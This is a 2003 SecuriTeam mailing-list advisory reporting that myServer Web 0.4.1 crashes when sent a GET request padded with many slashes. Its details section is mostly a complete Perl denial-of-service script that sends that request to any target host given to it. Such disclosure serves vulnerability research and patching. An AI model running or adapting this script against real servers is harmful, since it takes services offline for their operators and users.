[UNIX] myServer Vulnerable to Multiple Slashes Vulnerability (///..///)

From: SecuriTeam (support_at_securiteam.com)
Date: 06/24/03

  • Next message: SecuriTeam: "[NEWS] Sphera HostingDirector and Final User Control Panel CSS, DoS and Session Hijacking" 
    To: list@securiteam.com
Date: 24 Jun 2003 18:44:10 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security in Canada

    Toronto-based Sunrays Technologies is now Beyond Security's representative in Canada.
    We welcome ISPs, system integrators and IT systems resellers
    to promote the most advanced vulnerability assessment solutions today.

    Contact us at 416-482-0038 or at canadasales@beyondsecurity.com

    - - - - - - - - -

      myServer Vulnerable to Multiple Slashes Vulnerability (///..///)
    ------------------------------------------------------------------------

    SUMMARY

     <http://myserverweb.sourceforge.net/> myServer Web is a "free and easy to
    configure web server". The product contains a vulnerability that allows
    remote attackers to cause the server to crash by sending it a large amount
    of '/' (slashes) in the GET requests the attacker issues.

    DETAILS

    Vulnerable systems:
     * myServer version 0.4.1

    Exploit:
    #!/usr/bin/perl
     
    #Myserver 0.4.1 Remote Denial of service ;)
    #oh joy...
    #deadbeat, uk2sec
    #eip@oakey.no-ip.com
    #deadbeat@sdf.lonestar.org
     
    use IO::Socket;
    $dos = "//"x100;
    $request = "GET $dos"."HTTP/1.0\r\n\r\n";
     
    $target = $ARGV[0];
     
    print "\n\nMyserver 0.4.1 Remote Denial Of Service..\n";
    print "deadbeat, uk2sec..\n";
    print "usage: perl $0 <target>\n";
    $sox = IO::Socket::INET->new(
            Proto=>"tcp",
            PeerPort=>"80",
            PeerAddr=>"$target"
    )or die "\nCan't connect to $target..\n";
    print $sox $request;
    sleep 2;
    close $sox;
    print "Done...\n";

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:eip@oakey.no-ip.com> eip.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NEWS] Sphera HostingDirector and Final User Control Panel CSS, DoS and Session Hijacking"

    Relevant Pages